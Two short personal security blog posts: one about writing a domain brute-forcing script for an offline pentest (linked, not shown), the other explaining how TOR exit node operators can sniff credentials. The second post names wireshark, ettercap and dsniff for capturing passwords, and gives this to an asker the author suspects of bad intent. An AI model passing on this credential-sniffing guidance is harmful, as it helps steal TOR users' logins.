Domain Brute Forcer

This morning I found myself in a position where I needed to run a pentest without access to the internet. Sadly I also left my toolkit (laptop) at home, as I wasn't expecting to do this test.

Since I didn't have access to the internet, I couldn't download one of the many domain brute forcing tools...and that is exactly what I needed.

Since I had some time on my hands, I tossed together my own brute forcer. Its not well coded, but its proof that you really can pull tools out of your arse in a pinch.


Grab the script here.

Password Sniffing With TOR.

This afternoon I was approached by an indivual online who wanted to know if I could tell him how to sniff passwords off TOR like explained here:

http://www.theregister.co.uk/2007/09/10/misuse_of_tor_led_to_embassy_password_breach/

Of course he (or she) claimed that they wanted to prove it couldn't be done - yea right.

However, its really not all that hard. Many TOR exit nodes sniff their exit traffic. Most do so to protect themselves, some do so to capture credentials...there has even been rumors of the feds doing it to locate child porn sites.

Whatever the reason, using wireshark is a quick and easy way to sniff all the traffic, however if you have a busy exit node, you'll fill up your harddrive pretty quick, even if you only capture a few hundred bytes of each packet.

So back to the question at hand....using ettercap or dsniff will help you capture credentials without recording the full packet.

Now go play nice.